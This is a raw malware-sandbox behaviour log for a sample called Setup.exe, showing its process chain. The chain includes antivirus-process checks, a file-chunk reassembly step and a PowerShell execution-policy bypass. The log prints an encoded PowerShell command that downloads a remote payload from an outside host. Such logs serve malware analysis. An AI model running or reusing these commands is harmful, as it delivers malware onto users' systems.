      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsiA9D0.tmpJump to behavior
      Source: Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Setup.exeReversingLabs: Detection: 23%
      Source: Setup.exeVirustotal: Detection: 30%
      Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Nevertheless Nevertheless.cmd && Nevertheless.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 189943
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "ExpendituresReactionsRioWinterDialReducedPricingSoftware" Dennis
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Handbook + ..\Attorneys + ..\Celebration + ..\Advert + ..\Loop + ..\Objectives + ..\Added X
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\189943\Attachment.com Attachment.com X
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -Enc JAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMACgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AMwA2ADAALgBuAGUAdAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4AQwBsAG8AcwBlACgAKQAKAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxAAoACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGIAYQBpAGQAdQAuAGMAbwBtACIAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAKACAAIAAgACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGwAaQBwAGMAYQB0AGUAcABpAHUAMAAuAHMAaABvAHAALwBpAG4AdABfAGMAbABwAF8AcwBoAGEALgB0AHgAdAAiAAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0ACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwALgBXAHIAaQB0AGUAKAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAsACAAMAAsACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAb
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Nevertheless Nevertheless.cmd && Nevertheless.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 189943Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "ExpendituresReactionsRioWinterDialReducedPricingSoftware" Dennis Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Handbook + ..\Attorneys + ..\Celebration + ..\Advert + ..\Loop + ..\Objectives + ..\Added XJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\189943\Attachment.com Attachment.com XJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1"Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -Enc JAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAPQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMACgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AMwA2ADAALgBuAGUAdAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4AQwBsAG8AcwBlACgAKQAKAAoAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxAAoACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGIAYQBpAGQAdQAuAGMAbwBtACIAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAKACAAIAAgACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGwAaQBwAGMAYQB0AGUAcABpAHUAMAAuAHMAaABvAHAALwBpAG4AdABfAGMAbABwAF8AcwBoAGEALgB0AHgAdAAiAAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AAoAIAAgACAAIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0ACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwALgBXAHIAaQB0AGUAKAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAsACAAMAAsACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: iconcodecservice.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
